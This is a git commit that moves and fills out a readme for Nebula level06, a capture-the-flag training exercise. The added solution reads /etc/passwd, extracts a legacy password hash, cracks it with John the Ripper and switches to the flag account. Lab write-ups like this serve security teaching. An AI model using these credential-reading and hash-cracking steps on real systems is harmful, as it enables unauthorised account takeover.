Commit a995b98

bryfry <bryon@fryer.io>
2016-09-28 10:49:23
writeup level06
1 parent 75fb6e6
Changed files (2)
exploit_exercises
nebula
exercise-6
level06
exploit_exercises/nebula/exercise-6/readme.md
@@ -1,9 +0,0 @@
-
-----------------------------------------------
-
-About
-Source code
-The flag06 account credentials came from a legacy unix system.
-To do this level, log in as the level06 account with the password
-level06. Files for this level can be found in /home/flag06.
-There is no source code available for this level
exploit_exercises/nebula/level06/readme.md
@@ -0,0 +1,15 @@
+# Nebula - level06
+
+## About
+
+The flag06 account credentials came from a legacy unix system.
+To do this level, log in as the level06 account with the password
+level06. Files for this level can be found in /home/flag06.
+
+## Solution
+
+* `level06@nebula:~$` `grep flag06 /etc/passwd`
+* `root@kali#` `echo flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh > flag06.passwd`
+* `root@kali#` `john flag06.passwd`
+* `level06@nebula:~$` `su flag06` _john cracked password_
+* `sh-4.2$` `getflag`